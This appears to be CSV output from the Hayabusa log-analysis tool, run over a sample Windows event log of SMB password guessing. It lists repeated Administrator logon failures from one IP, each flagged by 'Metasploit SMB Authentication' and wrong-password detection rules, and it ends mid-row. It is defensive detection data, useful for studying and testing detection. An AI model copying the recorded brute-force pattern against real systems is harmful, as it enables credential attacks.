Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xS8U3UQNz6l0LZn0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no6cftQ5MF1fjZ0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5WHS6jVRnCUH0Rb5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i3oGLwrCJXJOauf6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1sxPrDYV3rr4pGJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Osysh2O2A3A2bN22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FsInW9EMJZU8FOrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ge8do8TM4GG1atMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w5GLbpVsAhGqCiq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8eQXeW1VpRU0ptMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhLosoA2parzTnW9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MCFTP4gVGEKFKuRI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALrDwJz2cta9fcXB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZZNXGw28osMQLjub : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wQzvMnwYuEQRO7V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UloOAIgGuj6NecfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cVSeLo2PRgGmf83Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SaCFO8CPFLuERugV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCwV1D4L5BDZSriK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QPhLQsM4R2ua4SxW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fwgp52JNi7xnTxpN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2GutBDenjweAluz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wflcgg5ebqu8hHGL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jXaaYSU2pakw6IsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfJnBv3eA8wZttML : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOXSI0jPfbvW4dAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JW6aX5mNz7cETsl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVuJLXJzlVnDLT4Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtSwhwnApnPI9AkO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1peOkjbd1WXGEAAM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Tbw3V9MtLIcxr65R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CEZ2v1f6t0luDj4D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R0omMppAFlFhE1mG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0jMvVN9eSeGW3zcN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnFNYabbO7IpbVku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KtyTTNdqVikZGYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DCChjnFv2hMXXwgW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvIYRZSomaJYJOH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEirUFRscaOwTuAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RwQgMM9H1oN4te9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JbGILYTcFwtYbDk1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5KzNsgWvyUhNEHd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KGvwbOtP3A5eDKCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YZvtNNX511hIleST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJBRTeW6OQtNrt5u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hovgq99STVt2GzrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4kpT3gf0VCAVuVSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 